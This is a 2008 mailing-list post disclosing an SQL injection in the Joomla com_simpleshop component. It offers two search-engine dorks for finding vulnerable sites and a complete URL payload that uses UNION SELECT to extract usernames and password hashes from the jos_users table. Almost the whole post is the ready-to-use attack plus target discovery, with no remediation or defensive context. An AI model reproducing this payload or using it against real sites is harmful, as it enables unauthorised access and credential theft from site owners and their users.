
Date: 24 Feb 2008 12:32:18 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: joomla com_simpleshop SQL Injection(section)  #

###############################################################
# 
#   joomla com_simpleshop SQL Injection(section)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
# 
#  DORK 1 : allinurl:"com_simpleshop"
# 
#  DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
   EXPLOIT : 

index.php?option=com_simpleshop&Itemid=S@...&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################
